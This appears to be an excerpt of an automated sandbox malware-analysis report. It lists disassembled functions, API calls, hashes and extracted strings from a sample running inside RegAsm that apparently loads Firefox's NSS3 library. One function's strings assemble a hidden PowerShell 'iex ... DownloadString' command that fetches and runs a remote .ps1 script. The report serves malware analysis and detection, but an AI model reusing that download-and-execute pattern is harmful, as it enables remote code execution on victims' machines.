                                                                                • Opcode ID: 483e57131535fdadae28dd77c858abae5a422696724e6e3437a896e050ac5ca4
                                                                                • Instruction ID: a88c845163d533e6575945f674fb7512c1aaa5a8ce2b89d88f7e2ab9d47f159f
                                                                                • Opcode Fuzzy Hash: 483e57131535fdadae28dd77c858abae5a422696724e6e3437a896e050ac5ca4
                                                                                • Instruction Fuzzy Hash: E35193B1F0121A8BDB24DF98DE456FE7774AB16349F148925DA09A3B00D335E906CBD2
                                                                                Function 0041282B Relevance: 19.6, APIs: 2, Strings: 9, Instructions: 310COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00412830
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 00412BFF
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                • String ID: "" $')"$*.ps1$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                • API String ID: 585178538-2722297100
                                                                                • Opcode ID: 9483e41db0ac2eb040231f30dcecdcea48590b6e4d5846af3410028562ffded0
                                                                                • Instruction ID: 4a9e700a9cdb5e2616cf4f83db54e7418e724996024359a16896e76ceccca2dd
                                                                                • Opcode Fuzzy Hash: 9483e41db0ac2eb040231f30dcecdcea48590b6e4d5846af3410028562ffded0
                                                                                • Instruction Fuzzy Hash: D2D15CB090424DEADB15EBE5C952BDEBBB8AF18308F5040BEE505735C2DA781B4CCB65
                                                                                Function 6C90ADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C90ADE6
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C90AE17
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C90AE29
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C90AE3F
                                                                                • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C90AE78
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C90AE8A
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C90AEA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: L_strncpyzPrint$L_strcatn
                                                                                • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
                                                                                • API String ID: 332880674-605059067
                                                                                • Opcode ID: b4c0ef0589e0cb060d01464a679b2c586657b97061275e9870e023b51421ebfe
                                                                                • Instruction ID: 9be6242c0d85d58895b9e7fe02cb5ae7c4b06aacad5f5bef8ecb2f4f7f6a7933
                                                                                • Opcode Fuzzy Hash: b4c0ef0589e0cb060d01464a679b2c586657b97061275e9870e023b51421ebfe
                                                                                • Instruction Fuzzy Hash: 74311532700205ABCB159F54DC88BAE7775AFA631CF048428E40D9BB02DF34D84ACBD2
                                                                                Function 6C9A4C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_value_text16.NSS3(?), ref: 6C9A4CAF
                                                                                • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C9A4CFD
                                                                                • sqlite3_value_text16.NSS3(?), ref: 6C9A4D44
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_value_text16$sqlite3_log
                                                                                • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                • API String ID: 2274617401-4033235608
                                                                                • Opcode ID: a690594916162166b7f3f0459c25783ef883d4043fb18080adca915352dc1141
                                                                                • Instruction ID: 3445fe02143fd77d93a82835ef5a55f1a793d581ce65e3e0a05e400856ac2eee
                                                                                • Opcode Fuzzy Hash: a690594916162166b7f3f0459c25783ef883d4043fb18080adca915352dc1141
                                                                                • Instruction Fuzzy Hash: 253154B3B48911B7D71846A8A8017E4B33A7B82318F156539D4294BE14CF25FC538FE2
                                                                                Function 6C906EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C906F16
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C906F44
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C906F53
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C906F69
                                                                                • PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C906F88
                                                                                • PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C906FA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
                                                                                • API String ID: 1003633598-226530419
                                                                                • Opcode ID: 4bea20277367af5357eeff3347b5b80bb495bc7d67b1602257947306fc261671
                                                                                • Instruction ID: fdefff977dbccfa09fffcdf998e5c02305660297a88c63295d5fe1b4ef29c0ad
                                                                                • Opcode Fuzzy Hash: 4bea20277367af5357eeff3347b5b80bb495bc7d67b1602257947306fc261671
                                                                                • Instruction Fuzzy Hash: 3F31F5357012159FDB149F24DD58B4A7BB5AFA631CF088428E90CD7612DB34D89ACBD1
                                                                                Function 6C902DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_InitPIN), ref: 6C902DF6
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C902E24
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C902E33
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C902E49
                                                                                • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C902E68
                                                                                • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C902E81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
                                                                                • API String ID: 1003633598-1777813432
                                                                                • Opcode ID: 12589d5b7e23ecf1d4a2703d863ee997255e0d0eacdc818ed9cea9787ec36d9e
                                                                                • Instruction ID: 55133ad05c0b6bb8814876bfa23f97d390ed1bcd178afb965c2ea7323c1fdf54
                                                                                • Opcode Fuzzy Hash: 12589d5b7e23ecf1d4a2703d863ee997255e0d0eacdc818ed9cea9787ec36d9e
                                                                                • Instruction Fuzzy Hash: 6931E171701215ABCB258F54DD5CB5A7BB5AFA6318F048028E80CE7B52DB34D84ACBE2
                                                                                Function 6C7FEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C7F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7C4A68), ref: 6C7F945E
                                                                                  • Part of subcall function 6C7F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7F9470
                                                                                  • Part of subcall function 6C7F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7F9482
                                                                                  • Part of subcall function 6C7F9420: __Init_thread_footer.LIBCMT ref: 6C7F949F
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C7FEC84
                                                                                • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7FEC8C
                                                                                  • Part of subcall function 6C7F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7F94EE
                                                                                  • Part of subcall function 6C7F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7F9508
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C7FECA1
                                                                                • AcquireSRWLockExclusive.KERNEL32(6C83F4B8), ref: 6C7FECAE
                                                                                • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C7FECC5
                                                                                • ReleaseSRWLockExclusive.KERNEL32(6C83F4B8), ref: 6C7FED0A
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C7FED19
                                                                                • CloseHandle.KERNEL32(?), ref: 6C7FED28
                                                                                • free.MOZGLUE(00000000), ref: 6C7FED2F
                                                                                • ReleaseSRWLockExclusive.KERNEL32(6C83F4B8), ref: 6C7FED59
                                                                                Strings
                                                                                • [I %d/%d] profiler_ensure_started, xrefs: 6C7FEC94
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                • String ID: [I %d/%d] profiler_ensure_started
                                                                                • API String ID: 4057186437-125001283
                                                                                • Opcode ID: 88a5d8841be719600cd204d352944487ac633c2e654bf5560016651576c5b0fc
                                                                                • Instruction ID: 2f1a60fc1be6cb785e4dfc342577480e9ad8ca2d1ca6deafdfe702b611f00743
                                                                                • Opcode Fuzzy Hash: 88a5d8841be719600cd204d352944487ac633c2e654bf5560016651576c5b0fc
                                                                                • Instruction Fuzzy Hash: B32126B16005189BCB209FA4DA4CAAB3739EB5632DF105A70FC2C47B41DB719806CBF1
                                                                                Function 6C9A2D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_initialize.NSS3 ref: 6C9A2D9F
                                                                                  • Part of subcall function 6C85CA30: EnterCriticalSection.KERNEL32(?,?,?,6C8BF9C9,?,6C8BF4DA,6C8BF9C9,?,?,6C88369A), ref: 6C85CA7A
                                                                                  • Part of subcall function 6C85CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C85CB26
                                                                                • sqlite3_exec.NSS3(?,?,6C9A2F70,?,?), ref: 6C9A2DF9
                                                                                • sqlite3_free.NSS3(00000000), ref: 6C9A2E2C
                                                                                • sqlite3_free.NSS3(?), ref: 6C9A2E3A
                                                                                • sqlite3_free.NSS3(?), ref: 6C9A2E52
                                                                                • sqlite3_mprintf.NSS3(6CA0AAF9,?), ref: 6C9A2E62
                                                                                • sqlite3_free.NSS3(?), ref: 6C9A2E70
                                                                                • sqlite3_free.NSS3(?), ref: 6C9A2E89
                                                                                • sqlite3_free.NSS3(?), ref: 6C9A2EBB
                                                                                • sqlite3_free.NSS3(?), ref: 6C9A2ECB
                                                                                • sqlite3_free.NSS3(00000000), ref: 6C9A2F3E
                                                                                • sqlite3_free.NSS3(?), ref: 6C9A2F4C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                • String ID:
                                                                                • API String ID: 1957633107-0
                                                                                • Opcode ID: 01d48342d71db5bfefca3f7f75ac042b835624d34fd6291ed838a496c27ea036
                                                                                • Instruction ID: 4fe27e2d1abe3307e3a882fb6758e156e2e94f47adb964a786225cf6ef7edc2b
                                                                                • Opcode Fuzzy Hash: 01d48342d71db5bfefca3f7f75ac042b835624d34fd6291ed838a496c27ea036
                                                                                • Instruction Fuzzy Hash: 2C61B4B5E016058BEB10CFAAD884BDEB7B5EF58348F244424DC09AB701E771E856CBA0
                                                                                Function 6C8F2C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(6C8F3F23,?,6C8EE477,?,?,?,00000001,00000000,?,?,6C8F3F23,?), ref: 6C8F2C62
                                                                                • EnterCriticalSection.KERNEL32(0000001C,?,6C8EE477,?,?,?,00000001,00000000,?,?,6C8F3F23,?), ref: 6C8F2C76
                                                                                • PL_HashTableLookup.NSS3(00000000,?,?,6C8EE477,?,?,?,00000001,00000000,?,?,6C8F3F23,?), ref: 6C8F2C86
                                                                                • PR_Unlock.NSS3(00000000,?,?,?,?,6C8EE477,?,?,?,00000001,00000000,?,?,6C8F3F23,?), ref: 6C8F2C93
                                                                                  • Part of subcall function 6C97DD70: TlsGetValue.KERNEL32 ref: 6C97DD8C
                                                                                  • Part of subcall function 6C97DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C97DDB4
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,6C8EE477,?,?,?,00000001,00000000,?,?,6C8F3F23,?), ref: 6C8F2CC6
                                                                                • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C8EE477,?,?,?,00000001,00000000,?,?,6C8F3F23,?), ref: 6C8F2CDA
                                                                                • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C8EE477,?,?,?,00000001,00000000,?,?,6C8F3F23), ref: 6C8F2CEA
                                                                                • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C8EE477,?,?,?,00000001,00000000,?), ref: 6C8F2CF7
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C8EE477,?,?,?,00000001,00000000,?), ref: 6C8F2D4D
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C8F2D61
                                                                                • PL_HashTableLookup.NSS3(?,?), ref: 6C8F2D71
                                                                                • PR_Unlock.NSS3(?), ref: 6C8F2D7E
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07AD
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07CD
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07D6
                                                                                  • Part of subcall function 6C8C07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C85204A), ref: 6C8C07E4
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,6C85204A), ref: 6C8C0864
                                                                                  • Part of subcall function 6C8C07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C8C0880
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,6C85204A), ref: 6C8C08CB
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(?,?,6C85204A), ref: 6C8C08D7
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(?,?,6C85204A), ref: 6C8C08FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                • String ID:
                                                                                • API String ID: 2446853827-0
                                                                                • Opcode ID: 33f78006e0817ff22aff7555cf48df839308f48348d03a5358c1e914309efd4a
                                                                                • Instruction ID: ea858f50d2a00f0f4d548c356f2af32d2034e65134c32f64add7da9348748ef6
                                                                                • Opcode Fuzzy Hash: 33f78006e0817ff22aff7555cf48df839308f48348d03a5358c1e914309efd4a
                                                                                • Instruction Fuzzy Hash: C0510AB5D00605ABEB205F28DD448AA7774BF1A35CB048934EC1897B11E735ED65C7E1
                                                                                Function 6C854C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854C97
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854CB0
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854CC9
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854D11
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854D2A
                                                                                • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854D4A
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854D57
                                                                                • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854D97
                                                                                • PR_Lock.NSS3(?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854DBA
                                                                                • PR_WaitCondVar.NSS3 ref: 6C854DD4
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854DE6
                                                                                • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854DEF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                • String ID:
                                                                                • API String ID: 3388019835-0
                                                                                • Opcode ID: 0d3d57fb4a12a2ad2cf846bcd5fc893c328c18be63f277fb2a6eed226673bbe2
                                                                                • Instruction ID: ff765964eed19bb5014adb12dfbd0836f45dcfa3a49e792b08b50801117cfa8f
                                                                                • Opcode Fuzzy Hash: 0d3d57fb4a12a2ad2cf846bcd5fc893c328c18be63f277fb2a6eed226673bbe2
                                                                                • Instruction Fuzzy Hash: 2C41D4B1A04715CFCB64AF78D6841A9BBF0BF86318F068A69DC48D7710E730D8A5CB81
                                                                                Function 6C91ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C91DE64), ref: 6C91ED0C
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C91ED22
                                                                                  • Part of subcall function 6C92B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA018D0,?), ref: 6C92B095
                                                                                • PL_FreeArenaPool.NSS3(?), ref: 6C91ED4A
                                                                                • PL_FinishArenaPool.NSS3(?), ref: 6C91ED6B
                                                                                • PR_CallOnce.NSS3(6CA32AA4,6C9312D0), ref: 6C91ED38
                                                                                  • Part of subcall function 6C854C70: TlsGetValue.KERNEL32(?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854C97
                                                                                  • Part of subcall function 6C854C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854CB0
                                                                                  • Part of subcall function 6C854C70: PR_Unlock.NSS3(?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854CC9
                                                                                • SECOID_FindOID_Util.NSS3(?), ref: 6C91ED52
